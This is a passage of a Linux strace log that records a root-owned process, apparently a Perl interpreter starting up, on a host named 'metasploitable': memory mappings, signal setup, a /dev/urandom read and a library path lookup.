\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

7774  07:20:17.826419 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

7774  07:20:17.826447 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d90000

7774  07:20:17.826465 mmap2(0xb7d99000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d99000

7774  07:20:17.826487 mmap2(0xb7d9b000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d9b000

7774  07:20:17.826507 close(1)          = 0

7774  07:20:17.826540 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d8f000

7774  07:20:17.826560 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d8f8c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

7774  07:20:17.826641 mprotect(0xb7f0b000, 4096, PROT_READ) = 0

7774  07:20:17.826710 munmap(0xb7f53000, 29913) = 0

7774  07:20:17.826743 set_tid_address(0xb7d8f908) = 7774

7774  07:20:17.826757 set_robust_list(0xb7d8f910, 0xc) = 0

7774  07:20:17.826772 futex(0xbfd129b0, 0x81 /* FUTEX_??? */, 1) = 0

7774  07:20:17.826793 rt_sigaction(SIGRTMIN, {0xb7f152c0, [], SA_SIGINFO}, NULL, 8) = 0

7774  07:20:17.826812 rt_sigaction(SIGRT_1, {0xb7f15340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

7774  07:20:17.826831 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

7774  07:20:17.826851 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

7774  07:20:17.826879 uname({sys="Linux", node="metasploitable", ...}) = 0

7774  07:20:17.826949 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

7774  07:20:17.827009 brk(0)            = 0x8153000

7774  07:20:17.827024 brk(0x8174000)    = 0x8174000

7774  07:20:17.827085 getuid32()        = 0

7774  07:20:17.827101 geteuid32()       = 0

7774  07:20:17.827115 getgid32()        = 0

7774  07:20:17.827128 getegid32()       = 0

7774  07:20:17.827267 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d6e000

7774  07:20:17.827306 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

7774  07:20:17.827329 read(1, "\232b\271\343", 4) = 4

7774  07:20:17.827353 close(1)          = 0

7774  07:20:17.827379 time(NULL)        = 1495624817

7774  07:20:17.827438 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbfd12680) = -1 ENOENT (No such file or directory)

